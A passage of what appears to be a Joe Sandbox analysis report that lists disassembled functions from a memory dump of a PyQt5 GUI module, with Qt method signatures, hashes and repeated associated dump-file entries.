                                                                                                                                                                                                                                          • Opcode ID: 4922172345a4479c70acc091e18e4ba280ae5181ab2e273d0bcc3e4d112f2741
                                                                                                                                                                                                                                          • Instruction ID: d4368cc6d176b7ebc7feb0abd0469fcf3ea682ee69803dc122234c53404f7154
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4922172345a4479c70acc091e18e4ba280ae5181ab2e273d0bcc3e4d112f2741
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64110437A18A46C1EB109F61E8896A933E5FB44FC0F914036DA8E07320EF3DE959C744
                                                                                                                                                                                                                                          Function 00007FF89D9B3ED0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?removeItem@@Rows@Standard
                                                                                                                                                                                                                                          • String ID: Bii$QStandardItem$removeRows$removeRows(self, row: int, count: int)
                                                                                                                                                                                                                                          • API String ID: 3935922224-2605227661
                                                                                                                                                                                                                                          • Opcode ID: 98b5eab0ca663b7545f5dbbba6bba62b6644beecb35b6c135b3ce3851194d83f
                                                                                                                                                                                                                                          • Instruction ID: 7ea12d504a421806217ca3dfd1483e67ed155919e71a65aa4a285cbd12aaeaf2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98b5eab0ca663b7545f5dbbba6bba62b6644beecb35b6c135b3ce3851194d83f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C311D476A18F46D1EB10CF15E8896A933A4FB44B84F914132DA9E03320EF3DE95AC744
                                                                                                                                                                                                                                          Function 00007FF89D96DDF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?insertColumns@Table@@Text
                                                                                                                                                                                                                                          • String ID: Bii$QTextTable$insertColumns$insertColumns(self, pos: int, num: int)
                                                                                                                                                                                                                                          • API String ID: 1320599217-1414679935
                                                                                                                                                                                                                                          • Opcode ID: c2e79ab330085aa936466265586938288323ce5024fb888fadea8fc43e718cbf
                                                                                                                                                                                                                                          • Instruction ID: 8a579f9317991f273005a29e1c4df6d186fbf9ef9ceb9413e84aaf1c83587166
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2e79ab330085aa936466265586938288323ce5024fb888fadea8fc43e718cbf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F911D476A18E46D5EB108F11E8896A933A5FB48BC4F914132DA9E03320EF39E95AC744
                                                                                                                                                                                                                                          Function 00007FF89D94DD10 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?markContentsDirty@Document@@Text
                                                                                                                                                                                                                                          • String ID: Bii$QTextDocument$markContentsDirty$markContentsDirty(self, from_: int, length: int)
                                                                                                                                                                                                                                          • API String ID: 4280019181-3993341970
                                                                                                                                                                                                                                          • Opcode ID: c1873b4b8f10b66a46508ea7acb5dace1b28583fbb4be53eb1e166910a366976
                                                                                                                                                                                                                                          • Instruction ID: 666e813881b8fe2a2d2a5b2bab42286b6354162190ae75d8e45eb496bd829a8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1873b4b8f10b66a46508ea7acb5dace1b28583fbb4be53eb1e166910a366976
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6911E636A18F46D1EB10DF11E8896A933B4FB48B94F914132DA9E03320EF3DE95AC744
                                                                                                                                                                                                                                          Function 00007FF89D9ABEB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?elementBool_Count@FromLongPainterPath@@
                                                                                                                                                                                                                                          • String ID: QTextFormat$isEmpty$isEmpty(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3302664181-1918454510
                                                                                                                                                                                                                                          • Opcode ID: a20901cf66dcde50ad7311a5c395280e8f3a9a5b817bce25026a6a24b8dbeafc
                                                                                                                                                                                                                                          • Instruction ID: 81d8f5ad7208571a6be1bd77add458739c0ec806999e9bfa7de865ab5e2bbf8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a20901cf66dcde50ad7311a5c395280e8f3a9a5b817bce25026a6a24b8dbeafc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12014037B09B46C1EB109F61E8895A933E4FB44BD0B854032DD9E47220EF78F5A9C344
                                                                                                                                                                                                                                          Function 00007FF89D987A80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?type@Bool_Format@@FromLongText
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$isValid$isValid(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 1807932774-2203707715
                                                                                                                                                                                                                                          • Opcode ID: 539d9a6b73d84f98c8ce6d1a88dde6d57cd4b261c6690ce56c5711ae50d42f25
                                                                                                                                                                                                                                          • Instruction ID: 13cb21608b80621e91fb94157095fd53b514a5f0e05ccd55b85838310dd852a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 539d9a6b73d84f98c8ce6d1a88dde6d57cd4b261c6690ce56c5711ae50d42f25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52014037A08A4682EB10CF60E8894A933E4FB44FD5B954032D99E47260EF7CE5A9C344
                                                                                                                                                                                                                                          Function 00007FF89D95FA90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?mergeCharFormat@QTextCursor@@QEAAXAEBVQTextCharFormat@@@Z.QT5GUI ref: 00007FF89D95FAF3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CharText$?mergeCursor@@Format@Format@@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextCursor$mergeCharFormat$mergeCharFormat(self, modifier: QTextCharFormat)
                                                                                                                                                                                                                                          • API String ID: 748513923-2286667590
                                                                                                                                                                                                                                          • Opcode ID: 586f634dc4f6d9b7bd72a6ee47e4bac3596031ed4dda38829d3eabed8fb44904
                                                                                                                                                                                                                                          • Instruction ID: fd2d345dbc907ff1e32ac5822d6c197ef6566aedbc18f8b9170fceddd2278ffd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 586f634dc4f6d9b7bd72a6ee47e4bac3596031ed4dda38829d3eabed8fb44904
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66111336A08E46D1EB109F15E8892A933A8FB48FD4F914032DA9E03320EF3DE55AC304
                                                                                                                                                                                                                                          Function 00007FF89D94FDB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setTextOption@QTextLayout@@QEAAXAEBVQTextOption@@@Z.QT5GUI ref: 00007FF89D94FE13
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setLayout@@Option@Option@@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextLayout$setTextOption$setTextOption(self, option: QTextOption)
                                                                                                                                                                                                                                          • API String ID: 3098923699-862581115
                                                                                                                                                                                                                                          • Opcode ID: a6fca749f5d39738b8f0310dade832657181aaeba41cee4f0bce66baddabda21
                                                                                                                                                                                                                                          • Instruction ID: 9ccefaa557d48ca44a12ed4e42508ff79c9cf3d5f41077ebe952b614533cb593
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6fca749f5d39738b8f0310dade832657181aaeba41cee4f0bce66baddabda21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6311F836A18E46D1EB109F15E8896A933A5FB44FD4F914132DA9E03320EF3DE565C744
                                                                                                                                                                                                                                          Function 00007FF89D96BD90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
